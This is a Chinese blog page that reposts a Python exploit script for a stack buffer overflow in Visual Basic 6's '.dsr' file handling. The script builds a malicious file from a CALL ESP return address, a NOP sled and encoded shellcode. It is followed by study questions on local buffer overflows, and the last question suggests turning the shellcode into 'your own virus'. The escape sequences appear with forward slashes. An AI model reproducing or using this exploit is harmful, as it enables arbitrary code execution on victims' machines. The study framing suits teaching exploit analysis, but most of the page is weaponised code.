最初级的堆栈溢出分析问题
来源:互联网 发布:vue.js 视频教程 编辑:程序博客网 时间:2024/05/20 01:33
import time
print "---------------------------------------------------------------------------"
print ' MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling Buffer Overflow/n'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org/n"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " connection or command name."
print "---------------------------------------------------------------------------"
EIP = "/xFF/xBE/x3F/x7E" #call ESP from user32.dll
nop = "/x90/x90/x90/x90"
shellcode = /
"/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49"+/
"/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36"+/
"/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34"+/
"/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41"+/
"/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x4a/x4e/x46/x34"+/
"/x42/x50/x42/x30/x42/x50/x4b/x38/x45/x44/x4e/x43/x4b/x38/x4e/x47"+/
"/x45/x30/x4a/x47/x41/x30/x4f/x4e/x4b/x48/x4f/x54/x4a/x41/x4b/x38"+/
"/x4f/x55/x42/x52/x41/x30/x4b/x4e/x49/x54/x4b/x48/x46/x33/x4b/x48"+/
"/x41/x50/x50/x4e/x41/x43/x42/x4c/x49/x59/x4e/x4a/x46/x48/x42/x4c"+/
"/x46/x47/x47/x50/x41/x4c/x4c/x4c/x4d/x50/x41/x50/x44/x4c/x4b/x4e"+/
"/x46/x4f/x4b/x43/x46/x35/x46/x52/x46/x30/x45/x37/x45/x4e/x4b/x58"+/
"/x4f/x45/x46/x42/x41/x50/x4b/x4e/x48/x46/x4b/x48/x4e/x30/x4b/x44"+/
"/x4b/x48/x4f/x35/x4e/x41/x41/x30/x4b/x4e/x4b/x38/x4e/x51/x4b/x38"+/
"/x41/x50/x4b/x4e/x49/x38/x4e/x45/x46/x32/x46/x50/x43/x4c/x41/x33"+/
"/x42/x4c/x46/x46/x4b/x48/x42/x34/x42/x33/x45/x38/x42/x4c/x4a/x47"+/
"/x4e/x30/x4b/x38/x42/x34/x4e/x50/x4b/x58/x42/x47/x4e/x41/x4d/x4a"+/
"/x4b/x58/x4a/x36/x4a/x30/x4b/x4e/x49/x50/x4b/x48/x42/x48/x42/x4b"+/
"/x42/x30/x42/x50/x42/x30/x4b/x38/x4a/x56/x4e/x43/x4f/x55/x41/x33"+/
"/x48/x4f/x42/x46/x48/x35/x49/x38/x4a/x4f/x43/x58/x42/x4c/x4b/x37"+/
"/x42/x55/x4a/x36/x42/x4f/x4c/x58/x46/x50/x4f/x35/x4a/x36/x4a/x59"+/
"/x50/x4f/x4c/x38/x50/x50/x47/x55/x4f/x4f/x47/x4e/x43/x56/x41/x56"+/
"/x4e/x46/x43/x56/x50/x32/x45/x46/x4a/x37/x45/x36/x42/x50/x5a"
try:
choice = int(raw_input('Choose 1 for "ConnectionName", 2 for "CommandName" bof or '+/
'3 to quit:/n==> '))
if choice == 1:
buff = 'Connection1' + " " * 559 + EIP + "A" * 12 + nop + shellcode + nop
try:
vb_dsr = /
'VERSION 5.00/n'+/
'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1/n'+/
' ClientHeight = 6315/n'+/
' ClientLeft = 0'+/
' ClientTop = 0/n'+/
' ClientWidth = 7935/n'+/
' _ExtentX = 13996/n'+/
' _ExtentY = 11139/n'+/
' FolderFlags = 1/n'+/
' TypeInfoCookie = 0/n'+/
' Version = 4/n'+/
' NumConnections = 1/n'+/
' BeginProperty Connection1/n'+/
' ConnectionName = "' + buff + '"/n'+/
' ConnDispId = 1001/n'+/
' SourceOfData = 3/n'+/
' QuoteChar = 34/n'+/
' SeparatorChar = 46/n'+/
' EndProperty/n'+/
' NumRecordsets = 0/n'+/
'End' + "/x0D/x0A" #"/x0D/x0A" ==> EOF
out_file = open('ConnectionName.dsr','w')
out_file.write(vb_dsr)
out_file.close()
print "FILE CREATED!"
except:
print "Something wrong in file creation!"
if choice == 2:
buff = 'Command1' + " " * 566 + EIP + "A" * 12 + nop + shellcode + nop
try:
vb_dsr = /
'VERSION 5.00/n'+/
'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1/n'+/
' ClientHeight = 6315/n'+/
' ClientLeft = 0'+/
' ClientTop = 0/n'+/
' ClientWidth = 7935/n'+/
' _ExtentX = 13996/n'+/
' _ExtentY = 11139/n'+/
' FolderFlags = 1/n'+/
' TypeInfoCookie = 0/n'+/
' Version = 4/n'+/
' NumConnections = 1/n'+/
' BeginProperty Connection1/n'+/
' ConnectionName = "Connection1"/n'+/
' ConnDispId = 1001/n'+/
' SourceOfData = 3/n'+/
' QuoteChar = 34/n'+/
' SeparatorChar = 46/n'+/
' EndProperty/n'+/
' NumRecordsets = 1/n'+/
' BeginProperty Recordset1/n'+/
' CommandName = "' + buff + '"/n'+/
' CommDispId = 1002/n'+/
' RsDispId = -1/n'+/
' ActiveConnectionName= "Connection1"/n'+/
' NumFields = 0/n'+/
' NumGroups = 0/n'+/
' ParamCount = 0/n'+/
' RelationCount = 0/n'+/
' AggregateCount = 0/n'+/
' EndProperty/n'+/
'End' + "/x0D/x0A" #"/x0D/x0A" ==> EOF
out_file = open('CommandName.dsr','w')
out_file.write(vb_dsr)
out_file.close()
print "FILE CREATED!"
except:
print "Something wrong in file creation!"
if choice == 3:
print "Be safe!"
if choice !=1 and choice != 2 and choice != 3:
print "D'oh! You MUST choose a value between 1 and 3"
except:
print "mmm... ok, you want it..."
time.sleep(4)
print "London Bridge is falling down,/nFalling down, falling down/nLondon Bridge is falling down/nMy fair lady" * 99999
Question:
*.dsr File analysis
1. Find a real .dsr file, then compare it with vb_dsr string. Eg, the size of a common .dsr file, its format, especially its EOF flag, that is, it can’t appear in your shell code, or else, your shell code may not function as expected.
Source code analysis
2. What do variable EIP stand for? Can you replace it by another address with the same instruction CALL ESP by using debuggers such as OllyDbg? Could you replace the file “User32.dll” by other necessary DLL loading by VB6.0, then modify the address of EIP properly. Finally, indicate the possibility of changing CALL ESP by JMP ESP. (Hint: the addresses of such instruction as well as the APIs vary in different release of DLL, so it’s recommendable to find them in your own computer in help of tool like Depends)
3. Notice that between shell code and EIP, there exists a space of 16 Bytes of no use. Explain why?
Shellcode Analysis
4. If you’ve successfully solved the first 3 questions, you’re now familiar with the principle of Local BOF. Now the rest work is find the result of the shellcode by referencing Intel Machine Code, and then you can finally modify it easily to your own virus.
- 最初级的堆栈溢出分析问题
- 一次堆栈溢出的分析
- 一次堆栈溢出的分析
- PerlRegex堆栈溢出的问题
- editText 的addTextChangeListener的堆栈溢出问题
- Linux堆栈溢出的经典问题
- 关于C++堆栈溢出的问题
- 线程堆栈溢出引起的问题
- XSL堆栈溢出问题
- ARM 堆栈溢出问题
- 关于堆栈溢出问题
- 堆栈溢出问题
- 堆栈溢出问题
- 堆栈溢出 的现象,
- 堆栈的溢出
- 堆栈的缓冲区溢出
- 堆栈溢出的原因
- 堆栈溢出的原因
- CreateThread和_beginthread的区别
- const用法小结(转)
- 世界编程语言排行榜08年01月_PHP 语言
- 关于项目管理的知识点
- 定义类
- 最初级的堆栈溢出分析问题
- TestCompelte与QTP在Web测试方面的比较
- 电脑系统常见进程-进程管理
- 类的成员概述
- Problem 1733 Common Subsequence(公共子序列)
- Struts 的工作流程
- 常量、字段和成员属性
- LTE:全面进步 迎接商用
- 禁止MOSS页面个性化